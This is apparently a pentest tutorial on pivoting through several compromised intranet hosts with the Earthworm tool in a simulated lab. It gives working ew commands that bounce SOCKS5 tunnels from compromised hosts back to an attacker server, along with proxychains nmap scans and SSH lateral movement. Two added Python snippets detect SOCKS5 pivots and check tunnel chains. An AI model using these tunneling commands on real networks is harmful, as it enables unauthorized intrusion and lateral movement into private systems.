Multi-level intranet pivoting with ew (Earthworm): a worked scenario
0x01 Requirement
When penetrating an intranet, you often need to proxy traffic into the internal network in order to expand further, for example:
- Port Scan
- Port Forwarding
- Access intranet web services
- ……
0x02 Scenario
The following simulates a typical usage scenario.
1. Environment configuration and network topology
- A1 - 120.xxx - Kali - attacker's server on the public network
- V1 - 10.10.1.111 - CentOS - server in the DMZ; it has no public IP of its own, and its web application on port 80 is exposed to the public network through an Nginx reverse proxy. A webshell has already been obtained on it. It can reach the 10.10.1 segment.
- V2 - 10.10.2.111 - CentOS - intranet server, not exposed to the public network; it can reach the 10.10.1 and 10.10.3 segments.
- V3 - 10.10.3.111 - CentOS - intranet server, not exposed to the public network, with a web application on port 8080; it is reachable from the 10.10.2 segment but not from the 10.10.1 segment.
2. Premise
During the engagement, the web application on V1 was penetrated from A1, a webshell was obtained on V1 and a reverse shell was bounced back to A1. The next step is intranet penetration: discovering further resources inside the network.
0x03 Operation
There are many tools for intranet pivoting, such as Earthworm (ew), Termite, reGeorg and nps. This walkthrough of the simulated network uses ew.
EW (Earthworm) is a portable intranet pivoting tool with two core functions, a SOCKS v5 service and port forwarding, with which pivoting can be completed in a complex network environment.
It supports "forward", "reverse" and "multi-stage cascade" modes for opening a tunnel into the network, giving direct access to its deeper segments and getting past network restrictions.
There are six modes:
- ssocksd - forward SOCKS proxy
- rcsocks - reverse proxy, stage 1: traffic forwarding (listener on the attacker side)
- rssocks - reverse proxy, stage 2: SOCKS5 service that bounces back to the listener
- lcx_listen - reverse proxy, stage 1: traffic forwarding (listener waiting for a bounce-back)
- lcx_tran - port forwarding (forward)
- lcx_slave - port binding (connects two remote ports together)
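The SOCKS5 service that ssocksd/rssocks provide speaks the RFC 1928 handshake, and that handshake is also what a defender can look for. The following is an added example, not part of the original article or of ew: a small classifier for the first client bytes of a TCP stream that recognises the SOCKS5 greeting and the CONNECT request that follows it. The sample bytes are constructed; the function and constant names are this example's own.

```python
# Added example, not part of the original article or of ew: a defender-side
# classifier for the first client bytes of a TCP stream, recognising the SOCKS5
# handshake (RFC 1928) that ssocksd/rssocks listeners speak. A SOCKS5 greeting
# arriving at an internal server on a port like 1080 or 9999 is a strong sign
# that a pivot tunnel of the kind shown in this article is in place.
import socket
import struct

SOCKS5 = 0x05
CMD_NAMES = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP_ASSOCIATE"}
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03


def parse_greeting(data: bytes):
    """Client greeting: VER | NMETHODS | METHODS[NMETHODS]. None if not SOCKS5."""
    if len(data) < 2 or data[0] != SOCKS5:
        return None
    n = data[1]
    if len(data) < 2 + n:
        return None
    return {"methods": list(data[2:2 + n]), "consumed": 2 + n}


def parse_request(data: bytes):
    """Request sent after method selection: VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT."""
    if len(data) < 4 or data[0] != SOCKS5 or data[2] != 0x00:
        return None
    cmd, atyp = data[1], data[3]
    if atyp == ATYP_IPV4 and len(data) >= 10:
        host, pos = socket.inet_ntoa(data[4:8]), 8
    elif atyp == ATYP_DOMAIN and len(data) >= 5 and len(data) >= 7 + data[4]:
        host, pos = data[5:5 + data[4]].decode("ascii", "replace"), 5 + data[4]
    else:
        return None  # IPv6 and truncated requests are not handled here
    port = struct.unpack("!H", data[pos:pos + 2])[0]
    return {"cmd": CMD_NAMES.get(cmd, f"0x{cmd:02x}"), "host": host, "port": port}


def classify_stream(client_bytes: bytes, server_port: int):
    """Finding for one client->server stream, or None if it is not SOCKS5.
    The request is only reported when it is already present in the captured bytes."""
    g = parse_greeting(client_bytes)
    if g is None:
        return None
    return {"protocol": "socks5", "server_port": server_port, "methods": g["methods"],
            "request": parse_request(client_bytes[g["consumed"]:])}


# Constructed sample: client bytes of proxychains on A1 reaching 10.10.3.111:8080
# through a SOCKS5 listener on port 1080 (greeting followed by a CONNECT request).
SAMPLE = (bytes([SOCKS5, 0x01, 0x00]) + bytes([SOCKS5, 0x01, 0x00, ATYP_IPV4])
          + socket.inet_aton("10.10.3.111") + struct.pack("!H", 8080))
```

Feeding the first client payload of each new inbound connection on an internal server through classify_stream, and alerting on any SOCKS5 finding on a host that is not a sanctioned proxy, flags the ssocksd/rssocks listeners used in every scene below.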
Scene One: proxy traffic to V1 and collect information inside the network
After obtaining a shell on V1, first download ew to it and prepare to set up a SOCKS5 proxy for local traffic.
There are two options here: forward proxy and reverse proxy.
Forward proxy:
Assume that the target machine V1 has a public IP (139.xxx); then a forward proxy can be used.
Start the SOCKS5 service on the target machine V1, listening on port 1080:
./ew -s ssocksd -l 1080
Then proxy traffic to port 1080 of 139.xxx, which is equivalent to proxying it through the target machine V1, and tools can be used through it for further penetration.
proxychains configuration on A1:
vi /etc/proxychains.conf
[ProxyList]
socks5 139.x.x.x 1080
Reverse proxy:
In this scenario V1 has no public IP but can access the public network. Since V1 has no address that can be reached directly, a forward connection is impossible, so a reverse (bounce-back) proxy connection is used instead.
On the attack machine A1, start local traffic forwarding: external traffic arriving on port 1080 is forwarded to local port 8888, which waits for the target's bounce-back connection:
./ew -s rcsocks -l 1080 -e 8888
Start the SOCKS5 service on the target machine V1 and bounce it back to port 8888 of the attack machine A1:
./ew -s rssocks -d 120.x.x.x -e 8888
The proxy channel is now set up: accessing port 1080 on A1 is equivalent to accessing port 8888, i.e. the SOCKS5 service on V1. Using proxychains on A1 to send traffic to local port 1080 therefore proxies that traffic through the target machine V1; a request initiated on A1 is effectively initiated from V1, and tools can now be used through it for further penetration.
proxychains configuration on A1:
[ProxyList]
socks5 127.0.0.1 1080
Next, from A1, scan the ports of the hosts in every segment V1 can reach with nmap:
proxychains nmap -p xxx -sT -Pn --open 10.10.1.111/16
Note: proxychains does not proxy ICMP packets, so add -Pn (skip host discovery and go straight to the TCP port scan).
The scan finds that V1 can reach one host in the 10.10.2 segment, V2 (10.10.2.111), with port 22 and others open.
Attempting to move on to V2, it turns out that password-less SSH login from V1 to V2 has been configured, so from the shell previously bounced back from V1, ssh logs in to V2 successfully.
Scene Two: proxy traffic to V2 for further information gathering
A shell on V2 has now been obtained. Inspecting V2 shows that it cannot reach the public network, so its traffic cannot be reverse-proxied to the public network directly; a multi-level proxy through V1 is needed. The traffic is then proxied to V2 for further probing.
Again there are two ways: forward proxy and reverse proxy.
Forward proxy:
Assume that the target machine V1 has a public IP (139.xxx); then a forward proxy can be used.
Start a SOCKS5 proxy on the target machine V2, listening on port 9999:
./ew -s ssocksd -l 9999
Start traffic forwarding on V1, binding port 1080 of V1 to port 9999 of V2, which establishes the SOCKS5 channel:
./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999
Then proxy traffic to port 1080 of 139.xxx, which is equivalent to proxying it through the target machine V2.
proxychains configuration on A1:
[ProxyList]
socks5 139.x.x.x 1080
Reverse proxy:
On the attack machine A1, start local traffic forwarding: external traffic arriving on port 1080 is forwarded to local port 8888, which waits for the target's bounce-back connection:
./ew -s lcx_listen -l 1080 -e 8888
Transfer ew to V2 and start a SOCKS5 proxy on V2 listening on port 9999:
./ew -s ssocksd -l 9999
Finally, on V1, bind port 8888 of A1 to port 9999 of V2, which establishes the SOCKS5 channel:
./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999
The proxy channel is now set up: accessing port 1080 on A1 is equivalent to accessing port 9999 on V2. Using proxychains on A1 to send traffic to local port 1080 proxies it through the target machine V2; a request initiated on A1 is effectively initiated from V2.
proxychains configuration on A1:
[ProxyList]
socks5 127.0.0.1 1080
Tools can now be used through it for further penetration; here, an nmap port scan from A1:
proxychains nmap -p xxx -sT -Pn --open 10.10.2.111/16
The scan finds that V2 can reach one host in the 10.10.3 segment, V3 (10.10.3.111), with port 8080 open.
According to the earlier scan from V1, the 10.10.1 segment cannot reach the 10.10.3 segment, but by using V2 as a springboard, deeper hosts and applications inside the network become accessible.
Set the browser proxy on A1 to local port 1080, i.e. traffic proxied to V2, and the intranet web application on V3 can be opened.
Opening http://10.10.3.111:8080 in the browser reveals an operations and maintenance management system, which could then be penetrated further over the web (not covered here).
Scene Three: suppose a shell on V3 has been obtained; now proxy traffic to V3 (three-stage cascade)
Forward proxy:
Assume that the target machine V1 has a public IP (139.xxx); then a forward proxy can be used.
Start traffic forwarding on V1, binding port 1080 of V1 to port 9999 of V2, which establishes the SOCKS5 channel:
./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999
Start traffic forwarding on V2, binding port 9999 of V2 to port 8888 of V3, extending the SOCKS5 channel:
./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8888
Start the SOCKS5 proxy on the target machine V3, listening on port 8888:
./ew -s ssocksd -l 8888
This is not the only way: the V1 → V3 leg can also be set up with the reverse-proxy method of Scene Two.
Then proxy traffic to port 1080 of 139.xxx, which is equivalent to proxying it through the target machine V3.
proxychains configuration on A1:
[ProxyList]
socks5 139.x.x.x 1080
Reverse proxy:
On the attack machine A1, start local traffic forwarding: external traffic arriving on port 1080 is forwarded to local port 8888, which waits for the bounce-back connection:
./ew -s rcsocks -l 1080 -e 8888
On V1, bind port 8888 of A1 to port 9999 of V2, which establishes the SOCKS5 channel:
./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999
On V2, start local traffic forwarding: traffic arriving on port 9999 is forwarded to local port 7777, which waits for the bounce-back connection from the target machine V3:
./ew -s lcx_listen -l 9999 -e 7777
On the target machine V3, start the SOCKS5 service and bounce it back to port 7777 of V2:
./ew -s rssocks -d 10.10.2.111 -e 7777
The proxy channel is now set up: accessing port 1080 on A1 is equivalent to accessing port 7777 on V2, i.e. the SOCKS5 service on V3. Using proxychains on A1 to send traffic to local port 1080 proxies it through the target machine V3; a request initiated on A1 is effectively initiated from V3.
proxychains configuration on A1:
[ProxyList]
socks5 127.0.0.1 1080
Scene Four: port forwarding under the three-stage cascade
ew also supports plain port forwarding; here the web application port of the intranet target V3 is forwarded out to the external network.
Forward proxy:
Assume that the target machine V1 has a public IP (139.xxx); then a forward proxy can be used.
Start traffic forwarding on V1, binding port 1080 of V1 to port 9999 of V2:
./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999
Start traffic forwarding on V2, binding port 9999 of V2 to port 8080 of V3:
./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8080
The forwarding channel is now set up: accessing port 1080 on V1 is equivalent to accessing port 8080 on V3.
Open http://139.xxx:1080 in the browser on A1 to reach the intranet web application on V3.
Reverse proxy:
On A1, start local traffic forwarding: external traffic arriving on port 1080 is forwarded to local port 8888, which waits for the bounce-back connection:
./ew -s lcx_listen -l 1080 -e 8888
On V1, bind port 8888 of A1 to port 9999 of V2:
./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999
On V2, start traffic forwarding, binding port 9999 of V2 to port 8080 of V3:
./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8080
The forwarding channel is now set up: accessing port 1080 on A1 is equivalent to accessing port 8080 on V3.
Open http://127.0.0.1:1080 in the browser on A1 to reach the intranet web application on V3.
0x04 Summary
Real-world scenarios may be more complex than these, or simpler; they are not elaborated on here. This article has tried to cover the common types of scenario and described the basic use of ew in four of them.
The content is based on tool usage and is not especially difficult; the key is to work out the actual data flow to the target inside the network, and to split a large, complex scenario into several small ones, which makes the problem easier.
What is learned on paper always feels shallow; to truly know this, one must practise it. I think only through more and more hands-on work can one keep making progress.
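As an added example of the "work out the data flow and split it into small scenes" advice (not part of the original article or of ew): a small model of a cascaded chain that checks, before anything is started, that each hop can reach its forward target and that the target is exactly what the next hop listens on. The Hop structure, the REACH table (built from the scans in Scenes One and Two) and the hop lists are this example's own; the correct chain is the forward chain of Scene Four.

```python
# Added example, not part of the original article or of ew: a small model of a
# cascaded tunnel that checks, before anything is started, that each hop can
# actually reach its forward target and that the target (-f/-g) is exactly the
# address and port the next hop listens on (-l). Hop and REACH are this
# example's own structures; the hops are the forward chain of Scene Four.
from dataclasses import dataclass


@dataclass(frozen=True)
class Hop:
    host: str         # machine this listener runs on
    host_ip: str      # its address as seen by the previous hop
    listen_port: int  # -l port (for the final service: the service port)
    to_ip: str = ""   # -f target, empty for the final service
    to_port: int = 0  # -g target port

# /24 segments each host can reach, as established by the scans in Scenes One and Two.
REACH = {"V1": {"10.10.1", "10.10.2"},
         "V2": {"10.10.1", "10.10.2", "10.10.3"},
         "V3": {"10.10.2", "10.10.3"}}

def segment(ip: str) -> str:
    return ".".join(ip.split(".")[:3])

def check_chain(hops, reach=REACH):
    """Return (ok, problems) for a list of hops ending at the target service."""
    problems = []
    for cur, nxt in zip(hops, hops[1:]):
        if segment(cur.to_ip) not in reach.get(cur.host, set()):
            problems.append(f"{cur.host} cannot reach segment {segment(cur.to_ip)}")
        if (cur.to_ip, cur.to_port) != (nxt.host_ip, nxt.listen_port):
            problems.append(f"{cur.host} forwards to {cur.to_ip}:{cur.to_port} but "
                            f"{nxt.host} listens on {nxt.host_ip}:{nxt.listen_port}")
    return not problems, problems

def end_to_end(hops):
    """Entry point a client connects to and the service it finally reaches."""
    return f"{hops[0].host_ip}:{hops[0].listen_port}", f"{hops[-1].host}:{hops[-1].listen_port}"

SCENE_FOUR = [
    Hop("V1", "139.x.x.x", 1080, "10.10.2.111", 9999),   # lcx_tran on V1
    Hop("V2", "10.10.2.111", 9999, "10.10.3.111", 8080),  # lcx_tran on V2
    Hop("V3", "10.10.3.111", 8080),                       # the web application itself
]
# Two broken variants: V3's address mistyped on V2, and V1 trying to skip V2,
# which the topology does not allow (10.10.1 cannot reach 10.10.3).
MISTYPED = [SCENE_FOUR[0], Hop("V2", "10.10.2.111", 9999, "10.3.10.111", 8080), SCENE_FOUR[2]]
SKIP_V2 = [Hop("V1", "139.x.x.x", 1080, "10.10.3.111", 8080), SCENE_FOUR[2]]
```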